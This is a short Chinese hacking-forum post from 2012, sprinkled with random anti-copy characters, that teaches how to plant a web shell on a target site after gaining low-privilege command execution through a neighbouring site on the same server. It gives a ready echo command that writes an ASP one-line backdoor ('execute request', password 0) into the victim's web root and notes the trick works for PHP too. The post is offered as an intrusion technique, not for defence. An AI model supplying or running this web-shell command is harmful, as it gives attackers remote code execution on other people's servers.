在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。4 c$ [' B9 J% O2 u2 a
\8 g# G7 E4 T) v命令格式0 l% s; d+ i: N7 ]0 }: r ]
e' R, `/ c0 ~
Echo 语句 >目标站绝对目录
* ^" w; R3 H9 ^3 z" u" l; @
4 g8 b: p2 @6 [例如: 2 \3 x# R4 i/ h' T2 Q
, [' @- I7 W, j, y% [/ f* P
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
/ G0 C( g! G9 u" b5 a1 B9 O a( i4 I' J) F9 f% |, {
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。8 \' i3 N3 O, x" I, F
|
发表于 2012-9-23 14:40:24
收藏
支持
反对